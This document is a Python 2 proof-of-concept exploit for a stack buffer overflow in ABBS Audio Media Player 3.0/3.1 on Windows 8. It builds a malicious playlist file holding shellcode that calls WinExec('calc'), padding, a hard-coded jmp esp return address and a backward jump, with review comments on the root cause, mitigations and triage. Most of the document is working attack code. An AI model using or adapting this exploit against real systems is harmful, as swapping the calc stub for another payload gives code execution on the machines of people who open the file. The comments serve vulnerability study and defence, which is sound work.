#!/usr/bin/env python
# ABBS Audio Media Player (3.0/3.1) Buffer Overflow exploit (M3U/LST)
# Win8
# Rh0
#
# Python 2 proof of concept. It writes "exploit.lst", a playlist file whose
# whole content is one oversized entry laid out as:
#   [5 NOPs][WinExec("calc",1) stub]["A" padding up to 4108 bytes]
#   [4-byte return-address overwrite][5-byte jmp back into the buffer]
#
# Review notes:
# - Root cause is presumably an unbounded copy of a playlist entry into a
#   fixed-size stack buffer in the player (not visible here); the fix is a
#   length check where M3U/LST entries are parsed.
# - The stub executes from the stack, so DEP/NX enforced on the player
#   process would stop it; a stack cookie (/GS) would catch the overwritten
#   return address before it is used.
# - Both addresses below are hard-coded and the author notes they may need
#   adjusting, i.e. the file is tied to one system's module layout.
# - Triage hint: a .lst/.m3u file holding a single entry longer than ~4 KB
#   with non-printable bytes is not a plausible playlist.

print "[*] Stack buffer overflow in ABBS Audio Media Player 3.0/3.1[*]"

# Number of bytes written before the saved return address is reached
# (author's value: "buffer until return address overwrite").
offset_to_ret = 4108
nop_sled = "\x90" * 5

## WinExec("calc",1)
calc_stub = "".join([
    "\x33\xC0",              # xor eax,eax
    "\x50",                  # push eax
    "\x68\x63\x61\x6C\x63",  # push 'calc'
    "\x8B\xDC",              # mov ebx, esp
    "\xB0\x01",              # mov al, 1
    "\x50",                  # push eax
    "\x53",                  # push ebx
    # mov eax, 0x74823086 -- WinExec@kernel32 minus 1; hard-coded, the author
    # notes it may have to be adjusted
    "\xB8\x86\x30\x82\x74",
    "\x04\x01",              # add al, 1
    "\xFF\xD0",              # call eax (WinExec@kernel32.dll = 0x74823087)
])

# jmp esp @user32.dll (0x7642ad54), little-endian. Hard-coded; per the author
# it may have to be replaced with an address that points to "jmp esp".
ret_overwrite = "\x54\xad\x42\x76"
# jmp backwards 4116 bytes (author's note): the bytes placed right after the
# overwritten return address, sending execution back into the buffer.
jump_back = "\xe9\xeb\xef\xff\xff"

# Assemble the entry; the order of the pieces is the layout described above.
payload = nop_sled + calc_stub
payload += "A" * (offset_to_ret - len(payload))
payload += ret_overwrite + jump_back

try:
    out_file = open("exploit.lst", "wb")  # exploit works also with .m3u
    out_file.write(payload)
    out_file.close()
    print "[*] exploit.lst created [*]"
except:
    # Bare except kept from the original: any failure above is reported as a
    # file-creation error.
    print "[*] Error while creating file [*]"

# NOTE(review): the listing lost its indentation; the final pause is assumed
# to sit at top level rather than inside the except branch.
print "[*] Enter to continue.. [*]"
raw_input()